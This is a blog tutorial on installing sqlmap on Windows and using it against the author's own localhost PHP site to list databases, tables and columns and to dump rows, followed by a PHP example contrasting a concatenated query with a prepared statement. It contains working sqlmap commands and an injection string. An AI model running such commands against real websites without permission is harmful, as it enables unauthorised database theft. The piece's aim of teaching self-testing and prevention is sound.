Check SQL Injection Vulnerabilities of Website Using sqlmap - Windows


In this tutorial, I will show you how to check your website for SQL injection vulnerabilities on Windows. It is very easy: all you need to do is install an open source tool named sqlmap. sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. Many hackers and developers use it on Kali Linux, but you can easily install it on a Windows machine too.

Before we start, what is SQL injection?

      SQL Injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements (also commonly referred to as a malicious payload) that control a web application’s database server (also commonly referred to as a Relational Database Management System – RDBMS). Since an SQL Injection vulnerability could possibly affect any website or web application that makes use of an SQL-based database, the vulnerability is one of the oldest, most prevalent and most dangerous of web application vulnerabilities.

Installation procedure of sqlmap on Windows

  1. sqlmap is developed in Python, so you need to download and install Python 2.7 on your computer. Download Python by visiting the following link.
  2. Now add Python to the Windows path. If you don't know how to add Python to the Windows path, visit the following link.
  3. Now download sqlmap from GitHub by visiting the following link.
  4. Now unzip it and open cmd in that folder.

Now some sqlmap commands

       Note: I used my mini project on localhost to demo SQL injection here. It is illegal to check other people's websites for SQL injection vulnerabilities without their permission, so please use only your own websites. My mini project is a small PHP website which I developed 2 years ago. It was my first website, and at that time I didn't know about these security vulnerabilities, so I didn't use any prepared statements. I will make a tutorial on how to prevent SQL injection in PHP in the future.

1) List DBMS databases using SQLMAP SQL Injection

python sqlmap.py -u http://localhost/miniprojecti/preview.php?id=Gandhi%20Before%20India --dbs 

[Screenshot: databases]

2) List tables of target database using SQLMAP SQL Injection 

python sqlmap.py -u http://localhost/miniprojecti/preview.php?id=Gandhi%20Before%20India -D miniproject --tables

[Screenshot: tables]

3) List columns on target table of selected database using SQLMAP SQL Injection

python sqlmap.py -u http://localhost/miniprojecti/preview.php?id=Gandhi%20Before%20India -D miniproject -T migrations --columns

[Screenshot: columns]

4) List contents of target columns of target table of selected database using SQLMAP SQL Injection

python sqlmap.py -u http://localhost/miniprojecti/preview.php?id=Gandhi%20Before%20India -D miniproject -T migrations -C migration --dump

[Screenshot: rows]

 

Note: if you are a PHP developer, please use a framework like CodeIgniter or Laravel, or always use prepared statements. Using a simple framework like CodeIgniter can improve your website's security very much.
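The difference a prepared statement makes, as an added PHP example (not the code of the author's mini project): the `books` table, the two function names and the in-memory SQLite database are assumptions chosen so the script runs offline with the pdo_sqlite extension.

```php
<?php
// Added example: hypothetical stand-in for a page like preview.php?id=...
// Assumptions: a `books` table keyed by title; SQLite in memory replaces
// MySQL so the script is self-contained. All rows are constructed.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE books (title TEXT PRIMARY KEY, summary TEXT)');
$pdo->exec("INSERT INTO books VALUES ('Gandhi Before India', 'constructed row 1')");
$pdo->exec("INSERT INTO books VALUES ('Another Title', 'constructed row 2')");

// Vulnerable pattern: the request value is pasted into the SQL text,
// so a quote inside the value changes the structure of the statement.
function previewConcatenated(PDO $pdo, string $id): array
{
    $sql = "SELECT title, summary FROM books WHERE title = '$id'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: the SQL text is fixed and the value is bound as data,
// so it is only ever compared against the title column.
function previewPrepared(PDO $pdo, string $id): array
{
    $stmt = $pdo->prepare('SELECT title, summary FROM books WHERE title = :id');
    $stmt->execute([':id' => $id]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a normal title and a value that contains SQL syntax.
$inputs = ['Gandhi Before India', "x' OR '1'='1"];
foreach ($inputs as $id) {
    printf(
        "%-22s concatenated=%d rows, prepared=%d rows\n",
        $id,
        count(previewConcatenated($pdo, $id)),
        count(previewPrepared($pdo, $id))
    );
}
```

For the second input the concatenated query matches every row in the table, while the prepared query matches none. The same `prepare()` and `execute()` calls work unchanged when the PDO object is created with a MySQL DSN.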

Note: I use both a username and a password for my mini project database, but sqlmap is still powerful enough to find everything.

If you have any doubts, please comment below.


Security
22nd Jul 2018 01:53:29 AM
PHP SQL MySQL

ShareurCodes

ShareurCodes is a code sharing site for programmers to learn, share their knowledge with younger generation.